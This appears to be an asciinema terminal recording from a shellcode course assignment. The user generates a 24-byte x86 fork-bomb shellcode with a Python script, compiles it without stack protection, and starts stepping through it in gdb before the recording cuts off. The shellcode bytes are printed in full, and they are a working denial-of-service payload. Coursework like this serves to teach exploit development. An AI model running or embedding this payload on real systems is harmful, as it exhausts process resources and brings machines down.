[24.801827, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b["]
[24.803224, "o", "K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m.\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;5H\u001b[?12l\u001b[?25h"]
[24.855679, "o", "\b.."]
[24.935176, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b["]
[24.935504, "o", "K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m..\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;6H\u001b[?12l\u001b[?25h"]
[24.940968, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b["]
[24.941216, "o", "K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m..\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;6H\u001b[?12l\u001b[?25h"]
[24.988019, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b["]
[24.988297, "o", "K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m..\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;6H\u001b[?12l\u001b[?25h"]
[25.215313, "o", "/"]
[25.767311, "o", "."]
[25.927647, "o", "."]
[26.200134, "o", "/"]
[26.440974, "o", "b"]
[26.552753, "o", "i"]
[26.751335, "o", "n"]
[26.84486, "o", "\u001b[1m/\u001b(B\u001b[m"]
[27.61588, "o", "\b/c"]
[27.6809, "o", "o"]
[27.847132, "o", "mpile.sh\u001b[1m \u001b(B\u001b[m"]
[28.303488, "o", "\b s"]
[28.415577, "o", "h"]
[28.576464, "o", "ellcode"]
[29.089602, "o", "."]
[29.560849, "o", "c"]
[29.864345, "o", "\r\n\u001b[?2004l"]
[29.872993, "o", "[*] Compiling shellcode"]
[29.873276, "o", "\r\n"]
[29.873495, "o", "[+] Calling gcc without stack protection"]
[29.873655, "o", "\r\n"]
[29.952458, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                               \u001b[12;1H \r"]
[29.954204, "o", "\u001b[1;23r\u001b[13;23r\u001b[11S\u001b[12;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b[1;24r\u001b[12;60H\u001b(B\u001b[m"]
[29.954692, "o", "\r\n"]
[29.954908, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[29.955096, "o", "\u001b[K"]
[29.955406, "o", "\u001b[?2004h"]
[30.027395, "o", "\u001b[?25l\u001b[24;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[13;4H\u001b[?12l\u001b[?25h"]
[30.095867, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b["]
[30.096153, "o", "K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[13;4H\u001b[?12l\u001b[?25h"]
[30.178841, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b["]
[30.179349, "o", "K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[13;4H\u001b[?12l\u001b[?25h"]
[30.857035, "o", "g"]
[30.944952, "o", "\bgd"]
[31.079396, "o", "b"]
[31.304103, "o", " "]
[31.487448, "o", "s"]
[31.615385, "o", "h"]
[31.804725, "o", "ellcode"]
[32.676504, "o", "\r\n\u001b[?2004l\u001b]0;SLAE ❐ SLAE ● 1 gdb\u0007\u001b[?25l\u001b[24d\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[14;1H\u001b[?12l\u001b[?25h"]
[32.807414, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b["]
[32.807711, "o", "K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[14;1H\u001b[?12l\u001b[?25h"]
[32.929444, "o", "Reading symbols from shellcode..."]
[32.93186, "o", "(no debugging symbols found)...done.\r\n"]
[32.934519, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b["]
[32.934988, "o", "K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[15;1H\u001b[?12l\u001b[?25h"]
[32.949208, "o", "(gdb) "]
[32.950862, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b["]
[32.951042, "o", "K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[15;7H\u001b[?12l\u001b[?25h"]
[33.004209, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b["]
[33.00453, "o", "K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[15;7H\u001b[?12l\u001b[?25h"]
[34.130323, "o", "b"]
[34.215438, "o", "r"]
[34.277369, "o", "e"]
[34.479432, "o", "a"]
[34.544894, "o", "k"]
[34.623527, "o", " "]
[34.952646, "o", "*"]
[35.08101, "o", "&"]
[35.383373, "o", "c"]
[35.496728, "o", "o"]
[35.57571, "o", "d"]
[35.663913, "o", "e"]
[35.912715, "o", "\r\n"]
[35.914673, "o", "Breakpoint 1 at 0x2008\r\n(gdb) "]
[36.953288, "o", "r"]
[37.048132, "o", "u"]
[37.2475, "o", "n"]
[37.807449, "o", "\r\n"]
[37.810394, "o", "Starting program: /media/sf_SLAE_Course/SLAE/Assignment_6/fork/shellcode \r\n"]
[38.033557, "o", "Shellcode Length:  24"]
[38.033851, "o", "\r\n"]
[38.034371, "o", "eax            0x402008"]
